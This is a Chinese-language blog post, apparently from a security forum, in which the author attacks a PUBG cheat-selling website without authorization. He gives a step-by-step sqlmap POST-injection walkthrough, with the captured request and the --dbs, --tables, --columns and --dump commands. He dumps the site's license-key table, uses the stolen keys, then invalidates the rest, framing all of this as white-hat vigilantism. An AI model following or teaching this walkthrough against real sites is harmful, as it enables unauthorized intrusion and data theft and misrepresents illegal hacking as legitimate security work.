作為當下熱度極高的競技遊戲,《絕地求生》的外掛產業已經形成了一條龐大的產業鏈,從招商到研發再到代理發售一氣呵成。
外掛到底出神入化到什麼程度?
幾天前下了班,約上二三好友,信心滿滿打開遊戲準備吃個雞的時候,遇到的確是這樣的:
騰空飛天術:
高速匍匐前進術:
百步穿楊隔空打人術:
超遠距離一槍爆頭連環殺人術:
當然還更出神入化的功能,只有你想不到沒有做不到:
怎麼樣?是不是一臉懵?遊戲體驗極差?
怎麼辦?舉報+投訴?是個辦法但並不符合一名白帽子的行事風格。
遊戲退出來後我扭頭就百度隨便找了個吃雞外掛網站。
sqlmap走起
這是一個post注入,我們把通過burp抓到的請求複製到一個txt文件裡面,然後放到c盤根目錄下。
POST /index.php/Home/Index/ajaxname HTTP/1.1[/size]
[size=3]Content-Length: 71[/size]
[size=3]Content-Type: application/x-www-form-urlencoded[/size]
[size=3]X-Requested-With: XMLHttpRequest[/size]
[size=3]Referer: [url]http://10.10.10.10/[/url][/size]
[size=3]Cookie: PHPSESSID=fhj6t4m3o79ov1n4dk36bn9413[/size]
[size=3]Host: 10.10.10.10[/size]
[size=3]Connection: Keep-alive[/size]
[size=3]Accept-Encoding: gzip,deflate[/size]
[size=3]User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21[/size]
[size=3]Accept: */*[/size]
[size=3]name=-1
然後我們打開sqlmap 輸入如下命令。
sqlmap.py -r c:.txt --data "name=-1"
當如下提示的時候,我們輸入Y然後回車繼續。
are you really sure that you want to continue (sqlmap could have problems)? [y/N]
稍等片刻後發現這裡的確存在注入。
我們輸入如下命令列出他的數據庫名稱
sqlmap.py -r c:.txt --data "name=-1" --dbs
可以看到數據庫已經出來了,他這個網站的數據庫是第一個。
輸入如下命令讀出表名字
sqlmap.py -r c:.txt --data "name=-1" -D _ka_打碼 --tables
從下圖可以看到,他的外掛卡密是存放在這個表裡面。
輸入以下命令讀出這個表裡面的所有字段
sqlmap.py -r c:.txt --data "name=-1" -D _ka_打碼 -T zd_kami --columns
可以看到,所有字段都出來了。
直接導出所有卡密
輸入如下命令導出這些字段
sqlmap.py -r c:.txt --data "name=-1" -D _ka_打碼 -T zd_kami -C "" --dump
我的虛擬機是2003系統,我們找到如下路徑C:Documents and SettingsAdministrator.sqlmapoutput 打開後發現剛剛下載的數據都在這裡
其他系統的話可能路徑不一樣,但是注意觀察sqlmap裡面會有路徑的提醒。
打開後我們注意觀察每一個卡密的後面。0表示沒有使用過,1表示已經被人使用。
剩下的你懂的,直接去下載他們的輔助,然後輸入卡密即可。
然後我扔給幾個朋友測試一下,果然能用,果斷清洗了一遍,看你們怎麼賣。
清洗完成後轉身離去,深藏功與名。
我不希望絕地求生從玩家與玩家之間的競技遊戲,慢慢演變成了玩家與外掛之間的鬥爭。
希望藍洞能大力打擊這些外掛使用者!維護優良的網絡環境,也祝大家遊戲愉快,大吉大利,每晚吃雞~
如果你也對相關技術感興趣,或致力於成為一名白帽子做互聯網安全的守護者,請關注我,會定期更新有用有趣的內容。
有任何問題或疑惑,下方留言即可,會認真回覆每一條評論~
閱讀更多 i春秋論壇 的文章
